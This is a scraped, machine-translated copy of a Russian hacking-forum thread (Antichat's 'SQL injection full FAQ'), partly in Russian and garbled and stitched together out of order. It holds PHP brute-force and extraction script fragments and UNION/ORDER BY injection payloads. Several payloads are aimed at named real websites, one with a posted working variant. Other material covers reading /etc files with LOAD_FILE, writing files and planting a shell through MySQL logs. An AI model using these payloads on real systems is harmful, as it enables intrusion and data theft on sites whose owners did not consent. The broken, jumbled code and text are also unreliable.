) ENGINE = MyISAM DEFAULT CHARSET = cp1251;
INSERT INTO `news` VALUES (1, '23 / 03/07 ', '12: 30', 'Hello vasya :)', 'Well, start
INSERT INTO `news` VALUES (2, '24 / 03/07 ',' 11:10 ',' Gee, and this is for a change
CREATE TABLE ùsers` (

`login` varchar (20) NOT NULL default '',
`password` varchar (20) NOT NULL default ''
) ENGINE = MyISAM DEFAULT CHARSET = cp1251;
INSERT INTO ùsers` VALUES ('Admin', 'PaSsWoRd');
In general, I hope you understand what you need to do with this ...
And now something more useful.

Script to display information through LIMIT or something else of this kind
Code:
$ header. = 'Cookie2: $ Version = 1'. "\ r \ n";
$ header. = "Host:". $ set ['h']. "\ r \ n \ r \ n";
$ dt = "";
$ fp = fsockopen ($ set ['h'], 80);
fwrite ($ fp, $ header);
while (! feof ($ fp)) $ dt. = fread ($ fp, 1024);
fclose ($ fp);
// Cut the necessary info

$ dt = substr ($ dt, strpos ($ dt, $ set ['b']) + strlen ($ set ['b']));
$ dt substr ($ dt, strpos ($ dt, $ set [ b ]) + strlen ($ set [ b ]));
  LOG IN
$ dt = substr ($ dt, 0, strpos ($ dt, $ set ['e']));
// Display info on screen

echo ($ dt. "\ r \ n");
flush ();
}
Script for brutal column and field names
Code:
fwrite ($ fp, $ header);

while (! feof ($ fp)) $ dt. = fread ($ fp, 1024);
fclose ($ fp);
// Well, accordingly, output to the screen.

$ found = 0;
if ($ set ['t'])
{
if (substr_count ($ dt, $ in_str)> 0) {echo ("<font color = 'green'> <b>". $ t
}
if ($ set ['t'] === false)
{
if (substr_count ($ dt, $ ou_str) === 0) {echo ("<font color = 'green'> <b>".
}
if ($ found === 0) echo ("<font color = 'red'>". $ tables_names [$ i]. "</ font>");
echo ("<hr> \ r \ n");
flush ();
}
Last edited: 31 May 2011
conschtebl , Stealer , cel1697i845 and 5 others like this.
7 Jul 2007 #5
.Slip
Elder - Elder

_Great_ said:
 LOG IN
In general, this is not the first article on this topic. They are written with enviable frequency almost every
2 weeks.
I agree, but this is the most complete collection of all.
By the way, it is much better than the selected topic:

https://forum.antichat.ru/threadnav19605-1-10.html
1 person likes this.
7 Jul 2007 #6
Abra
member
To what I did not write as or to the fact that this is a joke?
I think it is to the fact that the statement "the most important thing is to filter the
quotes" is not right. Filtering doesn't need anything at all is not right.
4 Oct 2007 #7
[53x] Shadow
Leaders of Antichat
Update
addition
There are system variables in MySQL:
@@ basedir
@@ datadir
@@ tmpdir
@@ version_compile_os
Query example:
Code:
http://www.site.com/index.php? id
With their help, you can open the paths:

-to the MySQL configuration files (my.ini, my.cnf);
-to MySQL logs (hostname.err, mysql.log, mysql.err, etc ..);
  LOG IN
In some cases, if there is a local inclusion, it is possible to fill up the shell through the
muscle logs (as through the Apache logs).
Using @@ version_compile_os , you can determine the type of OS.
You can often determine the type of OS, but not always, through version (), if the
returned version string is: the
string "-log" means OS * nix / linux
the string "-nt" means Windows type OS.
6 people like this.
4 Nov 2007 #8
HornetBlack
Member
Everything is good in the FACs, but they do not really reveal one question - the variants
of the queries used in the scripts. Example:
such a query gives the number of fields
http://www.site.org/article.php?id=3+order+by+4
and this query returns the error
http://www.site.org/article.php ? id = 3 + union + select + 1,2,3,4
The used SELECT statements have a different number of columns
In which variant of the query can this happen? Immediately, I note that the quotation
mark or parenthesis after the parameter value gives an error.
It is clear that besides the simplest SELECT x FROM t WHERE p = 'nn' query there can be
more complex variants, including and using brackets. I would like to know the methods
by which you can "calculate" the structure of the query. Any ideas?
4 Nov 2007 #9
c411k
Members of Antichat
HornetBlack said:
Everything is good in the FACs, but they do not really reveal one question - the variants of the queries
used in the scripts. Example:
here such a query gives the number of fields
http://www.site.org/article.php?id=3+order+by+4
and this query returns the error
http://www.site.org/article.php ? id = 3 + union + select + 1,2,3,4
In which variant of the query can this happen? Immediately, I note that the quotation mark or parenthesis
after the parameter value gives an error.
It is clear that besides the simplest SELECT x FROM t WHERE p = 'nn' query there can be more complex
 variants, including and using brackets. I would like to know the methods by which you can "calculate" the IN
 LOG
structure of the query. Any ideas?
put a comment.
order by 4 / *
select 1,2,3,4 / *
4 Nov 2007 # 10
Scipio
Members of Antichat
HornetBlack said:
Well, I'm not so novice

http://www.soaw.org./article.php?id=322+union+select+1,2,3,4/*
of The Used the SELECT statements have a Different number of columns
does not affect comment neither on warrant nor on union. If I am not mistaken, this indicates that the
parameter is the last one in the request and there are no orders and limits.
In general, imagine such a garbage, there are two requests in a row:
Code:
"select id, name, login, password, description from table where id =". $ id. ";"
"select id, name, login, password from table where id =". $ id. ";"
you enter an input: $ id = -1 order by 4 / *

in the end, everything will be like this:
Code:
"select id, name, login, password, description from table where id = -1 order by 4 / *
"select id, name, login, password from table where id = -1 order by 4 / *
errors as you see should not be

if you put $ id = -1 order by 5 / * then the second request will be an error
Unknown column '5' in 'order clause'
and you think that the fields 4 ... then
you insert an injection:

$ id = -1 union select 1,2,3,4 / *
right there the first query spits out the error
because in the first query of the fields 5

if you insert an injection:
$ id = -1 union select 1,2,3,4,5 / *
then this error will be spat out by the second query ...  LOG IN
this is the whole reason for your troubles ...
in this situation it is only possible to use subqueries

Last edited: 4 Nov 2007
3 people like this.
4 Nov 2007 # 11
HornetBlack
Member
Scipio said:
because in the first query of the fields 5

if you insert an injection:
$ id = -1 union select 1,2,3,4,5 / *
then this error will be spat out by the second query ...
this is the whole reason for your troubles ...
The idea is clear, but ... except for the union of requests through ";" in muscle is
allowed?
However, this is a special case of troubles, so I would really like to see in some FAQs an
analysis of possible query constructions in scripts and injecting options.
4 Nov 2007 # 12
ENFIX
Elder - Elder
> Is it possible to combine queries through ";" in muscle is allowed?

in the muscle line, yes.
And in functions, for example, mysql_query () is not, because she must return the result,
with it 1
4 Nov 2007 #13
Scipio
Members of Antichat
HornetBlack said:
Мысль понятна, но... разве объединение запросов через ";" в мускуле разрешено?
Впрочем, это частный случай заморочки, поэтому очень хотелось бы в каком-нибудь FAQ-е увидеть
Впрочем, это частный случай заморочки, поэтому очень хотелось бы в каком нибудь FAQ е увидеть
 анализ возможных конструкций запросов в скриптах и варианты инжектов.  LOG IN
А я тут и не предполагал, что это пхп код
я прост привел пример, так сказать теоретический, для лучшего понимания, чтоб
тебе не заморачиваться еще и на синтаксис языка
>это частный случай заморочки
частный, но иногда (сравнительно часто) встречающийся...
>видеть анализ возможных конструкций запросов в скриптах и варианты инжектов.
таких наверное нет, т.к. конструкции запросов и реализация инъектов зависят от

конкретного случая, а общие вещи характерные для всех (большинства) случаев и
так уже подробно освещены (даже чересчур)
4 Nov 2007 #14
HornetBlack
Member
Scipio said:
>видеть анализ возможных конструкций запросов в скриптах и варианты инжектов.

таких наверное нет, т.к. конструкции запросов и реализация инъектов зависят от конкретного
случая, а общие вещи характерные для всех (большинства) случаев и так уже подробно освещены
(даже чересчур)
В том-то и беда, что ФАКи переписывают друг у друга, а хотелось бы видеть больше
реальных примеров решения подобных заморочек.
Если кому интересно, то могут покопать данный пример и предложить варианты
решения
http://www.soaw.org./article.php?id=322
Вот еще одна заморочка:
http://www.remhq.com/news_story.php?id=593
17 полей, но выяснить версию скули не дает - функции version,user,database,
похоже, фильтруются, зато есть XSS в полях
4 Nov 2007 #15
Scipio
Members of Antichat
HornetBlack said:
В том-то и беда, что ФАКи переписывают друг у друга, а хотелось бы видеть больше реальных
примеров решения подобных заморочек.
примеров решения подобных заморочек.
 Если кому интересно, то могут покопать данный пример и предложить варианты решения  LOG IN
http://www.soaw.org./article.php?id=322
Вот еще одна заморочка:
http://www.remhq.com/news_story.php?id=593
17 полей, но выяснить версию скули не дает - функции version,user,database, похоже, фильтруются,
зато есть XSS в полях
Дык без элементарных знаний sql никакие факи не помогут, тут нужен свой подход
да и подумать надо немного....
дальше по твоим примерам
№1 - это примерно то, про что я тебе говорил, здесь помогут подзапросы
№2 - ошибка возникает из-за кодировки, вот рабочий вариант:
Code:
http://www.remhq.com/news_story.php?id=555592'%20union%20select%201,2,aes_decrypt(aes_encr
обход этой ошибки ты можешь посмотретть в других факах и статьях по мускул

инъекциям, коих бесчисленное множество в инете... в таких случаях ты можешь
использовать конструкцию, которую я тебе привел, эта конструкция разъясняется в
других статьях и факах по мускул инъекциям
Last edited: 4 Nov 2007
4 Apr 2008 #16
beerhack
Elder - Старейшина
I-I()/Ib said:
AES_DECRYPT(AES_ENCRYPT('строка'),'bla'),'bla')
Что-то здесь кол-во открытых и закрытых скобок не совпадает

Как правильно то?
7 Apr 2008 #17
Dr.Z3r0
beerhack said:
Что-то здесь кол-во открытых и закрытых скобок не совпадает

Как правильно то?
очепятка. вот так правильно  LOG IN
Code:
AES_DECRYPT(AES_ENCRYPT('строка','bla'),'bla')
2 people like this.
7 Apr 2008 #18
Qwazar
Если отчет об ошибках выключен то в данном случае можно определить наличие уязвимости вот так :
http://xxx/news.php?id=1'; --
...
Таким образом для MYSQL запрос остается прежним и отобразиться тоже самое что и для
http://xxx/news.php?id=1
Есть вариант, что скрипт тупо обрубает всё после цифр.
7 Apr 2008 #19
Scipio
Members of Antichat
Qwazar said:
Есть вариант, что скрипт тупо обрубает всё после цифр.
Если скрипт что-то фильтрует, экранирует, обрубает заменяет, непускает,

ограничивает таким образом, что невозможно использовать инъекцию, то это
называется, что инъекции нет, к чему тут пост твой? Топик именно про инъекции
7 Apr 2008 #20
Qwazar
К тому, что предложеный вариант проверки наличия иньекции, не даёт однозначной

уверенности в том, что иньекция есть.
Хотя заявлено:
Хотя заявлено:
  LOG IN
Если отчет об ошибках выключен то в данном случае можно определить наличие уязвимости вот так
1 2 3 4 5 6 → 13 Next > (You must log in or sign up to post here.)
Similar Threads - injection полный
Статьи TDSS ботнет: полное раскрытие информации

afonn, 6 Dec 2016, in forum: Статьи
Replies: 4 6 Dec 2016
Статьи Анализ PHP Object Injection в Joomla

eclipse , 14 Dec 2013 , in forum: Articles
Replies: 0 14 Dec 2013
Authoring SQL Injection articles for "completely newbies"

Boa , 17 Jul 2010 , in forum: Articles
Replies: 78 18 Aug 2013
Author articles [Microsoft Access SQL Injection] - Add-ons.

aka_zver , 8 Jun 2010 , in forum: Articles
Replies: 2 28 Jun 2010
English (US) 
ANTICHAT ™ © 2001-2027 Antichat Kft.
Contact Us Help Terms and Rules Privacy policy 

Author Articles - SQL Injection Full FAQ - ANTICHAT - Security Online Community

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Author Articles - SQL Injection Full FAQ - ANTICHAT - Security Online Community

Uploaded by

Copyright:

Available Formats

2019/4/14 Author articles - SQL injection full FAQ | ANTICHAT - Security online community

Author's articles SQL injection full FAQ

SQL injection full FAQ

For the assimilation of this article requires:

Basically this article was written as for MYSQL + PHP.

0.2 General Description

In general, let's start with an example.

Let's try to present the query in the form of SQL:

0.3 What is SQL injection all the same?

It is easier to disassemble using examples, so we’ll go back to the shop example.

letsgo , conschtebl , sashka3076 and 77 others like this.

1. HOW TO FIND SQL INJECTION

1.1 The first case (String incoming parameter)

 SELECT * FROM news WHERE id = '[COLOR = DarkOrange] 1 [/ COLOR]'  LOG IN

SELECT * FROM news WHERE id = '[COLOR = DarkOrange] 1' [/ COLOR] '

If you include error messages it will come out something like:

SELECT * FROM news WHERE id = '[COLOR = DarkOrange] 1' - [/ COLOR] '

1.2 Second case (Numeric input parameter)

SELECT * FROM news WHERE id = [COLOR = DarkOrange] 1 [/ COLOR]

If this message is not present, then there are three options:

 2. Error Reporting Off  LOG IN

To determine if the quote is filtered, you can enter http: //xxx/news.php? Id = 1

If error Reporting is off then check like this http: //xxx/news.php id =? 1 -

1.3 The third case (Authorization)

SELECT * FROM users WHERE login = 'Admin' AND pass = '123'

That for a DB it will be absolutely independent to such request:

1.4 The fourth case (Operator LIKE)

authorization script when entering a username and password requests information 

Now you can go to paragraph 2.

2. WHAT AND WHERE CAN YOU EXPLAIN FROM THIS USEFUL

2.1 UNION Team

Modifying script accesshttp: //xxx/news.php? id = 1 'UNION SELECT 1 - . We get

2.1.1.1 Selection of the number of fields (Method 1 - UNION operator )

http: //xxx/news.php? Id = 1 'UNION SELECT 1, 2 -

http: //xxx/news.php? Id = 1 'UNION SELECT 1,2,3 -

Error again.  LOG IN

http: //xxx/news.php? id = 1 'UNION SELECT 1,2,3,4,5,6 -

2.1.1.2 Selection of the number of fields (Method 2 - GROUP BY Operator )

Oops ... There was a type error.

Oh, again, an error ...

2.1.1.3. Selection of the number of fields (Method 3 - ORDER BY )

2.1.2 Definition of displayed columns

Or add a false condition:

2.1.3 SIXSS (SQL Injection Cros Site Scripting)

2.1.4 Column / table names

table INFORMATION_SCHEMA.TABLES contains information about all the tables in the

Output the first line:

The output of the second line:

And here we found the login , password fields .

2.1.4.2 The names of the columns / tables if there is no access to INFORMATION_SCHEMA

is necessary to select table_name until not disappear an error like:

Where the error message disappears, it means such a column exists.

2.1.5 Information output Accessing the

script in this way http: //xxx/news.php? Id = -1 'UNION SELECT 1,2, login,

2.2 Work with Files

2.2.1 Writing to a file

Example: http: //xxx/news.php? Id = -1 'UNION SELECT 1,2,3,4,5,6 INTO

It is forbidden to overwrite files

2.2.2 Reading Files

Consider the function LOAD_FILE

Example: http: //xxx/news.php? Id = -1 'UNION SELECT 1,2, LOAD_FILE (' etc /

There are also several for it restrictions.

The full path to the file must be specified.

4) / ! int / Expansion of the previous comment. Everything enclosed in this

SELECT pass [I] / ! 32302, login / [/ I] FROM users